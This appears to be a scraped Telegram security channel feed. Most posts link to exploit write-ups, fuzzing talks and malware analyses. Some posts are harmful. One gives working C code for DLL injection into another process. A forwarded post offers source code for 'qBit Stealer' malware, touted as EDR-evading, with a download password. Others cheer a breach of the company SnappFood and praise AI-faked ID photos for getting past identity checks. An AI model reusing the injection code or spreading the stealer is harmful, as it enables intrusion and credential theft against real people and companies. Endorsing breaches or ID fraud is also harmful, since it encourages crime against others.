great burpsuite series by Meraj Heydari
credit : @meraj_heydari
language : persian
https://www.youtube.com/playlist?list=PL7ZQRFOOo39A0kV-GK-kFaX2jGA3PMz0-
#burpsuite ,
———
@islemolecule_source
credit : @meraj_heydari
language : persian
https://www.youtube.com/playlist?list=PL7ZQRFOOo39A0kV-GK-kFaX2jGA3PMz0-
#burpsuite ,
———
@islemolecule_source
exploiting a use-after-free in Linux kernel 5.15 (Ubuntu 22.04) (CVE-2022-32250)
credit: @saidelike
research.nccgroup.com/2022/0…
#linux , #kernel , #analysis , #exploitation
__
@islemolecule_source
credit: @saidelike
research.nccgroup.com/2022/0…
#linux , #kernel , #analysis , #exploitation
__
@islemolecule_source
DLL Injection classic way
:)
1- address of the dll
2- allocate a buffer in target process
3- write dll address to that
4- create a thread to execute
#malware_dev
@islemolecule_source
:)
1- address of the dll
2- allocate a buffer in target process
3- write dll address to that
4- create a thread to execute
int main(int argc, char *argv[]) {
HANDLE processHandle;
PVOID remoteBuffer;
wchar_t dllPath[] = TEXT("C:\\experiments\\evilm64.dll");
printf("Injecting DLL to PID: %i\n", atoi(argv[1]));
processHandle = OpenProcess(PROCESS_ALL_ACCESS, FALSE, DWORD(atoi(argv[1])));
remoteBuffer = VirtualAllocEx(processHandle, NULL, sizeof dllPath, MEM_COMMIT, PAGE_READWRITE);
WriteProcessMemory(processHandle, remoteBuffer, (LPVOID)dllPath, sizeof dllPath, NULL);
PTHREAD_START_ROUTINE threatStartRoutineAddress = (PTHREAD_START_ROUTINE)GetProcAddress(GetModuleHandle(TEXT("Kernel32")), "LoadLibraryW");
CreateRemoteThread(processHandle, NULL, 0, threatStartRoutineAddress, remoteBuffer, 0, NULL);
CloseHandle(processHandle);
return 0;
}
iredteam#malware_dev
@islemolecule_source
Forwarded from .....
But a few months ago, we informed Snapfood indirectly about the existence of vulnerabilities
Snapfood servers were vulnerable and we had access to jira.snappfood.ir and jira.snapp.ir,... for months and warned about them but they didn't pay attention.
In this post, we thank the elites of SnapFood
بهنام نصراللهی
مهدی شکری
سپهر رشادی
According to our and other people's warnings, we are happy about what happened to SnappFood!
Please open Telegram to view this post
VIEW IN TELEGRAM
Initial Access – search-ms URI Handler
credit : @hackerfantastic
https://pentestlab.blog/2024/01/02/initial-access-search-ms-uri-handler/
#initial_access ,
———
@islemolecule_source
credit : @hackerfantastic
https://pentestlab.blog/2024/01/02/initial-access-search-ms-uri-handler/
#initial_access ,
———
@islemolecule_source
SQL Brute Force Leads to BlueSky Ransomware
credit : @1ZRR4H
https://thedfirreport.com/2023/12/04/sql-brute-force-leads-to-bluesky-ransomware/
———
@islemolecule_source
credit : @1ZRR4H
https://thedfirreport.com/2023/12/04/sql-brute-force-leads-to-bluesky-ransomware/
———
@islemolecule_source
Rust to Assembly: Understanding the Inner Workings of Rust . collection of blog posts show how Rust code maps to Assembly
https://eventhelix.com/rust/
#rust
———
@islemolecule_source
https://eventhelix.com/rust/
#rust
———
@islemolecule_source
Fuzz Everything, Everywhere, All at Once - Advanced QEMU-based fuzzing
https://media.ccc.de/v/37c3-12102-fuzz_everything_everywhere_all_at_once
#fuzzing #LibAFL #QEMU
———
@islemolecule_source
https://media.ccc.de/v/37c3-12102-fuzz_everything_everywhere_all_at_once
#fuzzing #LibAFL #QEMU
———
@islemolecule_source
We see a lot of threat actors in our Incident Response cases who disable or tamper with the local AV.
The website http://privacy.sexy has a copy & paste noscript to turn off most of Defenders features. [1] How many of these modifications (or deactivations) will trigger an alert in your environment?
@DebugPrivilege has written an excellent article about the various event logs Windows Defenders creates, in which event. [2]
Run the commands on a test system, and look for gaps in your monitoring
[1] https://privacy.sexy
[2] https://m365internals.com/2021/07/05/why-are-windows-defender-av-logs-so-important-and-how-to-monitor-them-with-azure-sentinel/
credit : @malmoeb
#AV ,
———
@islemolecule_source
The website http://privacy.sexy has a copy & paste noscript to turn off most of Defenders features. [1] How many of these modifications (or deactivations) will trigger an alert in your environment?
@DebugPrivilege has written an excellent article about the various event logs Windows Defenders creates, in which event. [2]
Run the commands on a test system, and look for gaps in your monitoring
[1] https://privacy.sexy
[2] https://m365internals.com/2021/07/05/why-are-windows-defender-av-logs-so-important-and-how-to-monitor-them-with-azure-sentinel/
credit : @malmoeb
#AV ,
———
@islemolecule_source
• Realistic “photos” were published on Reddit , which were generated by AI and are great for identity verification)) In one photo there is a girl with a sign, and in the second - with an ID card.
LINK
#informative
LINK
#informative
VirtualBox internals and exploitation (CVE-2023-21987 and CVE-2023-21991)
credit : @qriousec
https://qriousec.github.io/post/vbox-pwn2own-2023/
#virtualbox , #analysis ,
———
@islemolecule_source
credit : @qriousec
https://qriousec.github.io/post/vbox-pwn2own-2023/
#virtualbox , #analysis ,
———
@islemolecule_source
Tackling Anti-Analysis Techniques of GuLoader and RedLine Stealer
Link
#malware_analysis
@islemolecule_source
Link
#malware_analysis
@islemolecule_source
exploits_rootkits_in_browser_extensions.pdf
2 MB
Exploits and rootkits in your browser extensions
DEFCON 2021.
DEFCON 2021.
Forwarded from BlankRoom
Source Cocde qBit Stealer
Download Download
Password : blankroom
@Bl4nk_Room
Enjoy!
Hello, qBit Stealer is a stealer malware designed with the red teamer in mind. It is completely written in Go, not detectable by EDRs, and is capable of uploading any file to locker of your choice. Utilizing cutting-edge con-currency engine to upload as fast as possible
Download Download
Password : blankroom
@Bl4nk_Room
Enjoy!